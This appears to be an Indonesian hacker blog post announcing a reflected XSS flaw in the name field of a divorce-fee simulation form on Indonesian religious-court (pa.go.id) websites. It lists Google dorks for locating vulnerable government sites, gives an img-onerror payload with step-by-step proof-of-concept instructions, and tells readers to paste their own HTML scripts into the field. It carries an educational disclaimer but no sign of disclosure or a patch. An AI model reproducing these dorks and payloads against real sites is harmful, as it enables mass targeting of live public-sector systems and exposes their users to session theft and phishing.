XSS Discovered on Panjar.pa By 0x6ick

XSS Discovered on Panjar.pa By 0x6ick



[!]Dork: 

inurl:pa.go.id inurl:panjar
inurl:pa- intitle:"Pengadilan Agama" inurl:panjar
site:pa.go.id inurl:panjar
inurl:"/ar/" inurl:"panjar" site:pa.go.id
"Cetak SKUM" inurl:pa.go.id
inurl:pa.go.id intitle:"Cerai Gugatan" 
site:go.id inurl:pa inurl:panjar

[!] Target:

[+] Bug Detail:

Found bug Reflected Cross-Site Scripting (XSS) pada form input Nama di halaman simulasi biaya cerai.

Payload yang berhasil men-trigger XSS:
<img src=x onerror=prompt("XSSby0x6ick")>
Parameter vulnerable:
  • Input field: Nama Lengkap Anda

[+] Proof of Concept (PoC):

  • Step 1: Masukkan payload berikut pada field Nama Lengkap Anda:
<img src=x onerror=prompt("XSSby0x6ick")>
  • Step 2: Submit form sampai muncul pop-up dari browser.

[+] pict

  • Input Payload di Form



  • Pop-up XSS Berhasil Muncul


Di web ini Script jso tidak bisa

Dengan script html? Bisalah

Pertama buat sc disini->
terus copas semua scriptnya di bagian nama yang lain isi ngasal

Hasil



[+] Dampak:

  • Potensi pencurian session cookies, phishing, dan eskalasi serangan.
  • Risiko bagi user .go.id yang mengakses halaman ini.

[+] Discovered By:

0x6ick | 0x6sec: Hack, Patch, and Protect


[!] Catatan Etis:

Artikel ini hanya untuk tujuan edukasi dan meningkatkan keamanan siber di Indonesia.
  

Untuk artikel xss selanjutnya di sini

Post a Comment

Lebih baru Lebih lama